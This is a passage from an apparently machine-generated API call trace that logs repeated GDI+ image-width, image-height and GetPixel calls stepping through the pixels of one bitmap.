(image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.328] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=211, color=0x18e3d0) returned 0x0 [0274.328] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.328] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.328] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=212, color=0x18e3d0) returned 0x0 [0274.328] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.328] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.328] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=213, color=0x18e3d0) returned 0x0 [0274.328] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.329] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.329] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=214, color=0x18e3d0) returned 0x0 [0274.329] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.329] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.329] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=215, color=0x18e3d0) returned 0x0 [0274.329] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.329] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.329] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=216, color=0x18e3d0) returned 0x0 [0274.329] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.329] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.329] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=217, color=0x18e3d0) returned 0x0 [0274.329] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.329] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.329] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=218, color=0x18e3d0) returned 0x0 [0274.329] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.329] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.329] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=219, color=0x18e3d0) returned 0x0 [0274.329] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.330] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.330] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=220, color=0x18e3d0) returned 0x0 [0274.330] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.330] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.330] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=221, color=0x18e3d0) returned 0x0 [0274.330] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.330] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.330] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=222, color=0x18e3d0) returned 0x0 [0274.330] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.330] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.330] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=223, color=0x18e3d0) returned 0x0 [0274.330] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.330] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.330] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=224, color=0x18e3d0) returned 0x0 [0274.330] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.440] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.440] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=225, color=0x18e3d0) returned 0x0 [0274.440] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.440] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.440] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=226, color=0x18e3d0) returned 0x0 [0274.440] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.441] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.441] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=227, color=0x18e3d0) returned 0x0 [0274.441] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.441] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.441] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=228, color=0x18e3d0) returned 0x0 [0274.441] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.441] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.441] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=229, color=0x18e3d0) returned 0x0 [0274.441] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.441] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.441] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=230, color=0x18e3d0) returned 0x0 [0274.442] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.442] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.442] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=231, color=0x18e3d0) returned 0x0 [0274.442] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.442] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.442] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=232, color=0x18e3d0) returned 0x0 [0274.442] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.442] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.442] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=233, color=0x18e3d0) returned 0x0 [0274.442] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.442] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.442] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=234, color=0x18e3d0) returned 0x0 [0274.443] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.443] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.443] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=235, color=0x18e3d0) returned 0x0 [0274.443] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.443] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.443] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=236, color=0x18e3d0) returned 0x0 [0274.443] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.443] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.443] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=237, color=0x18e3d0) returned 0x0 [0274.443] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.443] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.443] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=238, color=0x18e3d0) returned 0x0 [0274.444] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.444] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.444] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=239, color=0x18e3d0) returned 0x0 [0274.444] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.444] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.444] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=240, color=0x18e3d0) returned 0x0 [0274.444] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.444] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.444] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=241, color=0x18e3d0) returned 0x0 [0274.444] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.444] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.444] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=242, color=0x18e3d0) returned 0x0 [0274.444] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.444] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.444] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=243, color=0x18e3d0) returned 0x0 [0274.444] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.444] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.444] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=244, color=0x18e3d0) returned 0x0 [0274.445] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.445] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.445] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=245, color=0x18e3d0) returned 0x0 [0274.445] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.445] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.445] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=246, color=0x18e3d0) returned 0x0 [0274.445] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.445] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.445] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=247, color=0x18e3d0) returned 0x0 [0274.445] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.445] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.445] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=248, color=0x18e3d0) returned 0x0 [0274.445] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0274.445] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0274.445] GdipBitmapGetPixel (bitmap=0x5d1b670, x=0, y=249, color=0x18e3d0) returned 0x0 [0275.013] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.013] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.013] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=29, color=0x18e3d0) returned 0x0 [0275.013] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.013] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.013] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=30, color=0x18e3d0) returned 0x0 [0275.013] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.014] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.014] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=31, color=0x18e3d0) returned 0x0 [0275.014] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.014] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.014] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=32, color=0x18e3d0) returned 0x0 [0275.014] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.014] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.014] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=33, color=0x18e3d0) returned 0x0 [0275.014] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.014] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.014] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=34, color=0x18e3d0) returned 0x0 [0275.014] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.015] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.015] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=35, color=0x18e3d0) returned 0x0 [0275.015] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.015] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.015] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=36, color=0x18e3d0) returned 0x0 [0275.015] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.015] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.015] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=37, color=0x18e3d0) returned 0x0 [0275.015] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.015] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.015] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=38, color=0x18e3d0) returned 0x0 [0275.015] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.015] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.015] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=39, color=0x18e3d0) returned 0x0 [0275.015] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.016] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.016] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=40, color=0x18e3d0) returned 0x0 [0275.016] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.016] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.016] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=41, color=0x18e3d0) returned 0x0 [0275.016] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.016] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.016] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=42, color=0x18e3d0) returned 0x0 [0275.016] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.016] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.016] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=43, color=0x18e3d0) returned 0x0 [0275.016] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.016] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.016] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=44, color=0x18e3d0) returned 0x0 [0275.016] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.017] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.017] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=45, color=0x18e3d0) returned 0x0 [0275.017] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.017] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.017] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=46, color=0x18e3d0) returned 0x0 [0275.017] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.017] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.017] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=47, color=0x18e3d0) returned 0x0 [0275.017] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.017] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.017] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=48, color=0x18e3d0) returned 0x0 [0275.017] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.017] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.017] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=49, color=0x18e3d0) returned 0x0 [0275.017] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.017] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.018] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=50, color=0x18e3d0) returned 0x0 [0275.018] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.018] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.018] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=51, color=0x18e3d0) returned 0x0 [0275.018] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.018] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.480] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=52, color=0x18e3d0) returned 0x0 [0275.480] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.480] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.480] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=53, color=0x18e3d0) returned 0x0 [0275.480] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.480] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.481] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=54, color=0x18e3d0) returned 0x0 [0275.481] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.481] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.481] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=55, color=0x18e3d0) returned 0x0 [0275.481] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.481] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.481] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=56, color=0x18e3d0) returned 0x0 [0275.481] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.481] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.481] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=57, color=0x18e3d0) returned 0x0 [0275.482] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.482] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.482] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=58, color=0x18e3d0) returned 0x0 [0275.482] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.482] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.482] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=59, color=0x18e3d0) returned 0x0 [0275.482] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.482] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.482] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=60, color=0x18e3d0) returned 0x0 [0275.482] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.482] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.483] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=61, color=0x18e3d0) returned 0x0 [0275.483] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.483] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.483] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=62, color=0x18e3d0) returned 0x0 [0275.483] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.483] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.483] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=63, color=0x18e3d0) returned 0x0 [0275.483] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.483] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.483] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=64, color=0x18e3d0) returned 0x0 [0275.483] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.484] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.484] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=65, color=0x18e3d0) returned 0x0 [0275.484] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.484] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.484] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=66, color=0x18e3d0) returned 0x0 [0275.484] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.484] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.484] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=67, color=0x18e3d0) returned 0x0 [0275.484] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.484] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.484] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=68, color=0x18e3d0) returned 0x0 [0275.484] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.485] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.485] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=69, color=0x18e3d0) returned 0x0 [0275.485] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.485] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.485] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=70, color=0x18e3d0) returned 0x0 [0275.485] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.485] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.485] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=71, color=0x18e3d0) returned 0x0 [0275.485] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.485] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.485] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=72, color=0x18e3d0) returned 0x0 [0275.485] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.485] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.486] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=73, color=0x18e3d0) returned 0x0 [0275.486] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.486] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.486] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=74, color=0x18e3d0) returned 0x0 [0275.486] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.486] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.486] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=75, color=0x18e3d0) returned 0x0 [0275.486] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.486] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.486] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=76, color=0x18e3d0) returned 0x0 [0275.486] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.486] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.486] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=77, color=0x18e3d0) returned 0x0 [0275.487] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.487] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.487] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=78, color=0x18e3d0) returned 0x0 [0275.487] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.487] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.487] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=79, color=0x18e3d0) returned 0x0 [0275.488] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.488] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.488] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=80, color=0x18e3d0) returned 0x0 [0275.488] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.488] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.488] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=81, color=0x18e3d0) returned 0x0 [0275.488] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.488] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.488] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=82, color=0x18e3d0) returned 0x0 [0275.488] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.488] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.488] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=83, color=0x18e3d0) returned 0x0 [0275.489] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.489] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.489] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=84, color=0x18e3d0) returned 0x0 [0275.489] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.489] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.489] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=85, color=0x18e3d0) returned 0x0 [0275.489] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.489] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.489] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=86, color=0x18e3d0) returned 0x0 [0275.489] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.489] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.490] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=87, color=0x18e3d0) returned 0x0 [0275.490] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.490] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.490] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=88, color=0x18e3d0) returned 0x0 [0275.490] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.490] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.490] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=89, color=0x18e3d0) returned 0x0 [0275.490] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.490] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.490] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=90, color=0x18e3d0) returned 0x0 [0275.490] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.491] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.491] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=91, color=0x18e3d0) returned 0x0 [0275.491] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.491] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.491] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, y=92, color=0x18e3d0) returned 0x0 [0275.491] GdipGetImageWidth (image=0x5d1b670, width=0x18e3c0) returned 0x0 [0275.491] GdipGetImageHeight (image=0x5d1b670, height=0x18e3c0) returned 0x0 [0275.491] GdipBitmapGetPixel (bitmap=0x5d1b670, x=212, 